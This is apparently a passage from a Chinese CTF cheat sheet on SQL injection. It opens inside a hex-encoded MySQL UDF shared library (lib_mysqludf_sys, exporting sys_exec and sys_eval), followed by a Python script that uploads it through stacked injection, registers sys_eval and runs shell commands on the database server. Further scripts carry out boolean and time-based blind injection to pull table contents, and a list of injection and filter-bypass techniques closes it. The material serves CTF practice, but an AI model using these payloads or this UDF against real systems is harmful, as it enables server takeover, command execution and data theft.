0000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
	codes.append(code[i:min(i+128,len(code))])

#建临时表
#sql='''create table temp(data longblob)'''
#payload='''0';{};-- A'''.format(sql)
#requests.get(url+payload)

#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#更新连接剩余数据
for k in range(1,len(codes)):
	sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
	payload='''0';{};-- A'''.format(sql)
	requests.get(url+payload)

#10.3.18-MariaDB	
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#命令执行，结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

NoSQL

MongoDB
MongoDB 注入指北

常用脚本

布尔盲注

import string
import requests
dic='{}-_'+string.digits+string.ascii_lowercase

url='xxxxxxx'
now=''
for i in range(1,50):
	flag=0
	for j in dic:
		payload='''xxxxxxx'''.format()
		#print(payload)
		data={'username':payload,'password':'xxxxx'}
		r=requests.post(url,data=data)
		#print(r.text)
		if 'xxx' in r.text:
			now+=j
			print(now)
			flag=1
			break
	if flag==0:
		break

import requests

url = "xxx"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
        payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23'
        data = {
            'id': f"100')||{payload}||('0"
        }
        r = requests.get(url,params=data)
        # r = requests.post(url,data=data)
        if "xxx" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

时间盲注

import requests
import string
import time

dic='{}-_,'+string.ascii_lowercase+string.digits

url='xxxxxx'
now=''
for i in range(1,50):
	flag=0
	for j in dic:
		a=time.time()
		payload='''xxxxxx'''.format()
		data={'ip':payload,"debug":0}
		r=requests.post(url,data=data)
		b=time.time()
		if b-a>1:
			now+=j
			flag=1
			print(now)
			break
	if flag==0:
		break

import requests

url = "http://xxx/?id=1%22and%20"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
        payload = f'if(ascii(substr((select/**/group_concat(xxx)from(yyy.zzz)),{i},1))>{mid},sleep(0.6),0)%23'

        try:
            # data = {
        	#    'uname':f"admin')and {payload}#",
        	#    'passwd': '1'
        	# }
            r = requests.get(url + payload,timeout=0.5)
            # r = requests.post(url, data=data, timeout=0.5)
            tail = mid
        except:
            head = mid + 1


    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

SQL注入

万能密码

手注

正常注入步骤（联合查询）

无回显

盲注

布尔盲注

时间盲注

报错注入

limit注入

update注入

insert注入

order by注入

group by注入

宽字节注入

堆叠注入

二次注入

二次urldecode注入

文件操作

绕过（bypass）

空格

单双引号

逗号

等号 / like

and / or

union

select

limit

where

information_schema

其他关键字

括号

数字

sys系统库

mysql系统库

无列名注入（or被过滤）

参考文

DNS带外注入（OOB）

UDF

NoSQL

MongoDB

常用脚本

布尔盲注

时间盲注